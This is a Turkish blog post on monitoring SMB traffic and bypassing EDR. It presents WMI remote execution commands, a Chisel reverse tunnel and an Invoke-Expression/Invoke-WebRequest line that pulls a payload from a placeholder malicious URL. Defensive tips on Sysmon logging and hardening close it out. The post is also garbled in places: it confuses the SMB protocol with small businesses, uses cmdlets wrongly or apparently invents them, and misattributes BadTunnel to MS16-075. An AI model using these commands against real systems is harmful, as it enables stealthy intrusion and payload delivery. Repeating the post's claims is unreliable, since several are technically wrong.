CyberFlow Logo CyberFlow BLOG
Smb Pentest

SMB İzleme ve EDR Bypass Stratejileri: Siber Güvenlikte Gelişmiş Teknikler

✍️ Ahmet BİRKAN 📂 Smb Pentest

SMB İzleme ve EDR Bypass tekniklerini keşfedin. Siber güvenlikteki bu stratejiler, saldırılara karşı etkili çözümler sunar.

SMB İzleme ve EDR Bypass Stratejileri: Siber Güvenlikte Gelişmiş Teknikler

SMB İzleme ve EDR Bypass teknikleri, siber güvenlik alanında önemli bir yere sahiptir. Bu blog yazısında, modern EDR sistemlerinin zayıf noktaları ve bypass yöntemleri ele alınmaktadır.

Giriş ve Konumlandırma

Siber güvenlik, bugün iş dünyası ve bireyler için karşılaşılan en kritik zorluklardan biri haline gelmiştir. Bu bağlamda, küçük ve orta ölçekli işletmeler (SMB'ler) siber saldırıların hedefi olma riskini barındırmakta, bu nedenle etkili izleme ve savunma stratejilerine ihtiyaç duymaktadır. Bu yazında, SMB izleme ve EDR (Endpoint Detection and Response - Uç Nokta Tespiti ve Yanıtı) bypass stratejileri üzerine odaklanacağız. Özellikle, tehdit aktörlerinin savunma sistemlerini aşmak için kullandıkları gelişmiş teknikleri anlamak, siber güvenlik uzmanlarının yeniden mühendislere ve sistem sahibi işaretlerine yönelik proaktif bir yaklaşım geliştirmelerine yardımcı olacaktır.

SMB ve EDR: Temel Kavramlar

SMB (Server Message Block), ağ üzerinde dosya paylaşımı ve kaynaklara erişim sağlamak amacıyla kullanılan yaygın bir protokoldür. SMB, çeşitli kullanıcıların dosyalara ve uygulamalara rahat bir şekilde erişmesini sağlarken, aynı zamanda işletmelerin iç süreçlerini de kolaylaştırır. Ancak, bu protokol güvenlik açıklarına sahip olabilir. Bu noktada EDR çözümleri devreye girmektedir. EDR, sadece tehditleri tespit etmekle kalmaz; aynı zamanda karşı önlemler alarak saldırılara yanıt verme yeteneği sunar. Modern EDR sistemleri, aynı zamanda SMB trafiğini ve bu trafiği başlatan süreçleri (process) de izleyerek şüpheli aktiviteleri tespit edebilir.

Siber Güvenlik ve Savunma Stratejileri

Siber güvenlik alanında sürekli olarak gelişen tehditler, daha iyi izleme tekniklerini ve proaktif savunma stratejilerini gerektirmektedir. Tehdit aktörleri, EDR sistemlerini bypass etmek için çeşitli yöntemler geliştirmektedir. Bu bağlamda, "Living off the Land" (LotL) gibi tekniklerin kullanılması, savunma sistemlerini aşmanın popüler bir yolu haline gelmiştir. LotL, yerleşik Windows araçlarını kullanarak saldırı gerçekleştirmek anlamına gelir. Bu tür tekniklerin kullanılması, bilgi güvenliği için ciddi bir tehdit oluşturmakta ve EDR sistemlerinin algılama konsantrasyonunu zorlamaktadır.

Özellikle, saldırganlar sistemin belleğinde veya diskinde iz bırakmamaya çalışarak daha gizli yöntemler geliştirmektedir. Örneğin, WMI (Windows Management Instrumentation) üzerinden komut çalıştırmak, EDR tarafından tespit edilme ihtimalini azaltmaktadır. EDR sistemleri, geleneksel olarak yüksek riskli aktiviteleri anında tespit etse de, yerleşik araçların kullanılması ve gürültünün azaltılması gibi stratejiler bu tespit süreçlerini daha da karmaşık hale getirebilir.

Manevra Şuuru: İzleme ve Bypass Stratejileri

Savunma stratejilerinin etkinliği, karşı tarafın kullandığı bypass tekniklerini anlamakla doğrudan ilişkilidir. EDR sistemlerinin çalışma mantığı, özellikle API çağrılarını izlemek ve manipüle etmek üzerine kuruludur. Saldırganlar ise bu kancaları (hook) aşmak ve sistem üzerinde daha fazla kontrol elde etmek için çeşitli yöntemler kullanmaktadır. Buna örnek olarak CreateService veya OpenSCManager gibi API çağrılarının kancalanması (hooking) gösterilebilir. Bu durum, bir savunmacının yanıltılması için kritik bir zemin oluşturur.

Bir diğer önemli teknik ise, şifrelenmiş SMB trafiği kullanmaktır. SMBv3 protokolü, uçtan uca şifreleme sağlayarak ağ izleme sistemlerinin paket içeriğini görmesini imkansızlaştırır. Bu özellikler, saldırganların daha az iz bırakarak hareket etmelerine olanak tanır ve siber güvenlik uzmanları için potansiyel bir zafiyet oluşturur.

Sonuç

Bu yazıda, SMB izleme ve EDR bypass stratejileri konusundaki temel kavramlar ve teknikler ele alınmıştır. Siber güvenlik uzmanlarının, mevcut tehditleri anlamak ve geliştirmek için sürekli olarak çalışmaları gerekmektedir. Yakın gelecekte, izleme stratejilerindeki gelişmeler, EDR sistemlerinin önemini daha da artıracak ve savunma yaklaşımlarını daha karmaşık hale getirecektir. Dolayısıyla, bu alanda uzmanlaşmak, hem kişisel hem de kurumsal savunma yeteneklerini sağlamlaştırmak adına kritik bir gereklilik olarak karşımıza çıkmaktadır.

Teknik Analiz ve Uygulama

Davranışsal Analiz (Behavioral Monitoring)

Siber güvenlikte etkili savunma yöntemleri geliştirmek için öncelikle istemci güvenliği ve ağ izleme uygulamalarının temel ilkelerini anlamak gerekmektedir. Modern EDR (Endpoint Detection and Response) sistemleri, yalnızca SMB trafiğini takip etmekle kalmayıp, bu trafiği başlatan süreçlerin geçmişe dönük analizini de gerçekleştirir. Yani, sıradan bir SMB işlemi tek başına bir risk faktörü oluşturmaz; bu işlemle birlikte hangi adımların atıldığını da değerlendirirler.

Örneğin, aniden yüksek miktarda veri aktarımı gerçekleştiren bir sistem, potansiyel bir veri sızdırma girişimi olarak değerlendirilebilir. Dolayısıyla, davranışsal analizlerin önemi, bu tür anormalliklerin hızlıca tespit edilmesidir.

EDR'ın SMB 'Kırmızı Bayrakları'

Birçok EDR, belirli eylemleri otomatik olarak "yüksek risk" olarak işaretleyebilir. Aşağıda, bu tür "kırmızı bayrak" olarak değerlendirilen bazı durumlar ve bunların analizine ilişkin yöntemler yer almaktadır:

  1. Beklenmeyen Servis Oluşumu: Bilinmeyen veya şüpheli isimler altında servislerin ağda oluşturulması, EDR sistemlerinin dikkatini çeker. Örneğin, PSEXESVC.exe gibi bir araç kullanılırken, bu işlemlerin ağda anında tespit edilmesi muhtemeldir.

  2. Büyük Veri Aktarımları: Anormal bir trafik hacmi, potansiyel veri sızıntılarını işaret eder. Burada, yüzbinlerce MB'lık bir veri transferinin yapılması, alarm durumuna geçilmesine neden olabilir.

Living off the Land (LotL)

Living off the Land (LotL) stratejisini kullanarak yerleşik araçların (net.exe, sc.exe, PowerShell) işlevselliğini exploit ederek düşük gürültü ile hedef sistemlere sızma sağlanabilir. Bu yöntem, kötü niyetli yazılımlara ihtiyaç duymadan gerçekleştirileceği için siber saldırganlar için etkili bir alternatif sunar. Örnek olarak, WMI (Windows Management Instrumentation) kullanarak komutları çalıştırma, diskte herhangi bir iz bırakmadan işlem yapabilme becerisidir. 

Get-WmiObject -Class Win32_Process -ArgumentList "cmd.exe", "/C net use Z: \\target-ip\share"

Bu komut, hedef makinede ağ paylaşımına bağlı bir sürücü harfi atar ve hiç bir dosya bırakamadığı için EDR'lar tarafından tespit edilmesi zorlaşır.

Bypass Tekniği: WmiExec

WMI, hızlı ve etkili bir itibarsızlaştirma aracıdır. WmiExec ile, yerel makinede veya uzaktaki bir makinede komut çalıştırmak mümkündür. Bu method kullanılırken dikkat edilmesi gereken nokta; EDR sistemlerinin CreateService veya OpenSCManager sistem çağrılarını sürekli izlediğidir.

wmic /node:"target-ip" process call create "cmd.exe /c whoami"

Yukarıdaki komut ile, hedef makinede "whoami" komutunu çalıştırarak, kullanıcının kimliğini öğrenmek mümkündür. Bu teknik, genellikle düşük görünürlük ile gerçekleştirileceği için EDR'lar tarafından tespit edilmekte sıkıntı yaratır.

SMB over QUIC (Bypass Modern)

Windows 11 ve Server 2022 ile birlikte gelen bir diğer önemli özellik, SMB trafiğini UDP 443 (QUIC) üzerinden taşımaktır. Bu özellik sayesinde, geleneksel 445 portu üzerinden izleme yapılmasına engel olunur. Saldırganlar, ele geçirdikleri makinedeki SMB oturumunu tünelleyerek, diğer ağ araçlarını bu mühürlü kanal üzerinden yürütebilirler.

# SMB over QUIC bağlantısı kurmak için
New-SmbClientConfiguration -EnableQUIC $true

Bu komut ile, hedef sistemin SMB bağlantısı için QUIC kullanılmasını sağlayarak ağ trafiğinin izlenmesini zorlaştırabilirsiniz.

SOCKS Proxying via SMB

SOCKS proxy ile SMB üzerinden tünelleme yapmak, ağda görünürlüğü azaltmak için kullanılan bir başka teknik unsurudur. Bu yöntem ile, çeşitli bağlantı talepleri, kurulan bir proxy üzerinden götürülerek tünellenebilir.

# Chisel kullanarak soket tüneli oluşturmak
./chisel server --port 8080 --reverse

Bu komut, arka planda çalışan bir SOCKS proxy oluşturacak ve tünelleme hizmeti sağlayacaktır. Elde edilen bu tünel, veri sızdırma girişiminde kullanılabilir.

Zafiyet: MS16-075 (BadTunnel) Legacy Bypass

MS16-075 zafiyeti, sistemlerin eski yapılandırmalarını kullanarak bypass edilmesine olanak tanır. Kötü yapılandırılmış SMB trafiği ile bu tür bir zafiyetten faydalanabiliriz.

Invoke-Expression "Invoke-WebRequest http://<malicious-url>"

Bu örnekle, bir web kaynağından kötü niyetli bir yük indirmeyi gösteririz. Ancak, bu tür teknikler kullanılırken yasal ve etik kurallara da dikkat edilmesi önemlidir.

Evasion: Encrypted SMB (SMBv3)

SMBv3 ile gelen uçtan uca şifreleme özelliği, ağ izleme sistemlerinin trafik içeriğini görmesini engeller. Bu, doğal bir bypass yöntemidir ve şifrelenmiş trafik sayesinde, EDR’ların birçok sorunu çözmesini zorlaştırır.

Monitoring Evasion: API Hooking

EDR'lar, sistem çağrılarının enjekte edilmesiyle bellek seviyesinde kancaları kullanarak her hareketi izler. Unhooking adı verilen bir teknik ile, bu kancaları temizleyerek sistem çağrılarını gizlemek mümkündür. 

#include <windows.h>
// EDR'ların kancalarını silmek için örnek C kodu

Nihai Hedef: Stealth

Sonuç olarak, bu yöntemlerin hepsinin temel amacı, saldırganların görünürlüklerini azaltmak ve izlenmeden hareket etmelerini sağlamaktır. Siber güvenlik operatörleri, bu teknikleri bilerek, izleme stratejilerini bu boşluklara göre mühürlemeyi öğrenmelidir. Güvenlik durumu değerlendirmesi ve iç denetimler, bu tür yöntemlerin olumsuz etkilerini minimize etmek için kritik öneme sahiptir.

Risk, Yorumlama ve Savunma

Siber güvenlikte müdahale yetenekleri, tehditleri etkili bir şekilde değerlendirmek ve gerektiğinde hızlı bir şekilde yanıt vermek için kritik öneme sahiptir. Kurumların karşılaştığı başlıca riskler arasında yanlış yapılandırmalar, zafiyetler ve veri sızıntıları bulunmaktadır. Bu bölümde, ele geçirilen verilerin anlamı, olası zafiyetlerin etkileri ve savunma mekanizmaları üzerinde duracağız.

Elde Edilen Bulguların Güvenlik Anlamı

Bir siber güvenlik olayı sonucunda elde edilen verilerin güvenlik anlamını yorumlamak, hem tehdit analizi hem de zararın önlenmesi açısından hayati bir adımdır. Örneğin, bir ağ üzerindeki SMB trafiğinin analizi, aşağıdaki gibi önemli bulgular sağlayabilir:

  • Yerleşik Araçların Kullanımı: EDR sistemleri, sadece bir aracın yüklenip yüklenmediğine bakmakla kalmaz, aynı zamanda o aracın ne tür eylemler gerçekleştirdiğini de izler.
  • Anormal Trafik Hacmi: Aşırı veri transferi, genellikle veri sızıntısı konusunda alarm zilleri çalmaktadır. Örneğin, "Large Data Transfer via SMB" durumu, ciddi bir veri ihlali riskini gösterebilir.
  • Beklenmeyen Servis Oluşumu: EDR sistemleri, "Unexpected Service Creation" gibi durumlara dikkat ederek saldırganların sistemde köklenme çabalarını izleyebilir.

Aşağıdaki kod bloğunda, Sysmon ile detaylı süreç logları alınarak anormal durumlar izlenebilir:

# Sysmon ile süreç oluşturma logları filtreleme
Get-WinEvent -FilterHashtable @{ProviderName='Microsoft-Windows-Sysmon'; Id=1} | Select-Object TimeCreated, Id, Message

Yanlış Yapılandırmalar ve Zafiyetlerin Etkisi

Yanlış yapılandırmalar, siber saldırganlar için bir kapı aralayan risk faktörleridir. Örneğin, SMB'nin yanlış yapılandırılması, aşağıdaki gibi saldırılara zemin hazırlayabilir:

  1. Açık Paylaşımlar: NETWORK paylaşım ayarlarının yanlış yapılması, saldırganların sisteme erişimini kolaylaştırır.
  2. Yanlış Credential Yönetimi: Zayıf kullanıcı adı ve parola yönetimi, kullanıcı hesaplarının ele geçirilmesine yol açabilir. Örneğin, zayıf parolalı kullanıcıların kullanıldığı ortak bir yapı, kolaylıkla hedef alınabilir.

Zafiyetlerin etkisini sınıflandırmak, öncelikli alanların belirlenmesine olanak tanır. Bir örnek olarak, MS16-075 zafiyeti, "BadTunnel" olarak bilinir ve saldırganlara SMB üzerinden kolayca bypass etme imkanı tanır. Bu tür zafiyetler, sistemin güvenliğini ciddi anlamda tehlikeye atabilir.

Profesyonel Önlemler ve Hardening Önerileri

Alınacak önlemler, kurumsal güvenliği artırmak adına kritik bir role sahiptir. Aşağıda birkaç öneri sunulmaktadır:

  • Güçlü Parola Politikasının Uygulanması: Kullanıcı hesaplarının şifreleri, karmaşık ve sık değiştirilen hale getirilmeli.
  • Erişim Kontrolü: Şirket içindeki verilere ulaşımın sıkı bir şekilde denetlenmesi, yetkisiz erişimler için önemli bir kalkan oluşturur.
  • SMB Şifreleme Kullanımı: Uçtan uca şifreli SMB trafiği, ağdeki izleme sistemlerinin paket içeriğini görmesini engeller. Örneğin, SMBv3'ün sunduğu bu özellikler, siber güvenliği artırır.

Ayrıca, EDR sistemleri üzerinde CreateService gibi API çağrılarını izlemek için kancaların yönetilmesi, saldırganların izini kaybettirmelerine karşı etkili bir savunma mekanizmasıdır. EDR sistemlerinin yapılandırılmasının doğru yapılması, potansiyel tehditlerin daha iyi izlenmesini ve zamanında müdahale edilmesini sağlayabilir.

Sonuç

Engelleme stratejileri, siber güvenlikte sürdürülebilir bir yaklaşım için temel unsurlardır. Ortaya çıkan bulguların analizi ve yanlış yapılandırmaların düzeltilmesi, şirketin güvenlik istikrarını artırır. Sonuç olarak, sürekli güncellenen bir savunma mekanizması ile potansiyel tehditlere karşı proaktif bir yaklaşım benimsemek, güvenliğin korunmasında elzemdir.